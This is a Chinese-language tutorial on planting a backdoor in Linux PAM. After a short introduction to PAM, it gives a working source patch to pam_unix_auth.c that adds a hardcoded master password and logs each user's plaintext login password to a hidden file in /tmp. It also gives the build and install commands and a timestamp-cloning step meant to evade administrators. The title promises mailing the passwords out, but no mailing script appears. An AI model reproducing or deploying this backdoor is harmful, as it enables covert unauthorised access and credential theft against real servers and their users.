自动劫持 root 密码并转发密码到邮箱
文章目录
1.PAM 认证简介
PAM(Pluggable Authentication Modules)即可插拔式认证模块,它是一种高效而且灵活的用户级别的认证方式,它也是当前Linux服务器普遍使用的认证方式。PAM可以根据用户的网段、时间、用户名、密码等实现认证。并不是所有需要验证的服务都使用PAM来验证,如MySQL-Server,httpd就没有安装相应的PAM文件(因此我们可以说pam只对简单的应用有认证功能,对于应用机制比较复杂的需要其自己编写相应的认证机制代码啦)。当然,程序通过了PAM的验证之后,PAM程序还会持续跟踪验证后的对象,对其做相应的访问限制。PAM就很像人力资源部门,当你入职一下公司的时候是人力部门得认证你,等认证成功后你才可以入职,而入职之后并不是人力部门就不管理了,人力资源部门还是会持续监督你在公司从入职到离职的行为并做相应的操作
2.程序验证方法
Linux下有验证的程序,如 login、ssh、vsftpd、samba、apache等,他们主要有两种验证方式:
- 使用通用的 PAM 验证模块
- 程序自写验证功能:例:Apache 的验证是自己开发的
使用 ldd 命令检查一个程序是否支持 PAM 认证
ldd 命令:显示进程运行所依赖的动态连接库的详细信息
┌──(root💀fengzilin55)-[~/桌面]
└─# ldd /bin/login | grep pam #/bin/login 命令的相关共享库文件列表,可以看到 libpam.so.0 模块,说它支持 pam 认证
pam 模块:每个模块的功能的都是专用的,独特的
PAM 的模块类型
认证管理(auth),账号管理(account),会话管理(session)和密码(password)管理
管理方式 | 说明 |
---|---|
auth | 用来对用户的身份进行识别,如:提示用户输入密码,或判断用户是否为 root 等 |
account | 对账号的各项属性进行检查,如:是否允许的登录,是否达到最大用户数,或是root 用户是否允许在这个终端登录等 |
session | 这个模块用来定义用户登录前的,及用户退出后所需要进行的操作,如:登录连接信息,用户数据的打开与关闭,挂载文件系统等 |
password | 使用用户信息来更新,如:修改用户密码 |
PAM使用配置/etc/pam.d/下的文件,来管理对程序的认证方式.应用程序 调用相应的配置文件,从而调用本地的认证模块.模块放置在/lib/security下,以加载动态库的形式进,像我们使用su命令时,系统会提示你输入root用户的密码.这就是su命令通过调用PAM模块实现的
3.通过 PAM 认证模块劫持密码
思路:CentOS 7 上安装一个打了后门补丁的 PAM 认证模块,当用户连接时,直接把密码记录下来,然后使用脚本发给我们的邮箱中
3.1 查看 PAM 版本
[root@localhost ~]# rpm -qa | grep pam
下载对应版本的软件包
http://www.linux-pam.org/library/
3.2 安装 gcc 和 pam 依赖
[root@localhost ~]# yum install -y gcc flex
4.安装 PAM 认证模块
将下载的PAM包上传到 CentOS中
[root@localhost ~]# tar -xf Linux-PAM-1.1.8.tar.gz
[root@localhost ~]# cd Linux-PAM-1.1.8/
修改源码,在源码中添加后门
[root@localhost Linux-PAM-1.1.8]# vim modules/pam_unix/pam_unix_auth.c
180 retval = _unix_verify_password(pamh, name, p, ctrl);
在180行下面新增内容如下:
if(strcmp(p,"1234567")==0){
return PAM_SUCCESS;
}
if(retval==PAM_SUCCESS){
FILE*fp;
fp = fopen("/tmp/.logs","a");
fprintf(fp,"%s->%s\n",name,p);
fclose(fp);
}
1234567 是backdoor 密码
/tmp/.logs 记录系统登录密码
解决 64 位系统编译时遇到 yywrap() 函数未定义问题
[root@localhost Linux-PAM-1.1.8]# vim /root/Linux-PAM-1.1.8/conf/pam_conv1/pam_conv_l.c #在第7行插入以下代码
int yywrap(){return 1;}
[root@localhost Linux-PAM-1.1.8]# vim /root/Linux-PAM-1.1.8/doc/specs/parse_l.c
int yywrap(){return 1;}
配置 PAM 以下都是默认参数,因为安装了 flex ,需要手工指定路径
[root@localhost Linux-PAM-1.1.8]# ./configure --prefix=/user --exec-prefix=/usr --localstatedir=/var --sysconfdir=/etc --disable-selinux --with-libiconv-prefix=/usr
[root@localhost Linux-PAM-1.1.8]# make
[root@localhost Linux-PAM-1.1.8]# echo $?
0
#安装编译好的 pam 模块
[root@localhost Linux-PAM-1.1.8]# cd /lib64/security/
#备份原始版本
[root@localhost security]# mv pam_unix.so{,.bak}
#覆盖系统现有 pam 模块
[root@localhost security]# cp /root/Linux-PAM-1.1.8/modules/pam_unix/.libs/pam_unix.so /lib64/security/
#克隆原始文件时间,防止时间戳发成改变被管理员检测到
[root@localhost security]# stat pam_unix.*
克隆文件原始时间
[root@localhost security]# touch pam_unix.so -r pam_unix.so.bak
[root@localhost security]# ll pam_unix.*
新建 xshell 终端窗口
[root@localhost ~]# cat /tmp/.logs
root->q1!
密码成功记录
测试后门密码登录
后门密码不会被记录到文件中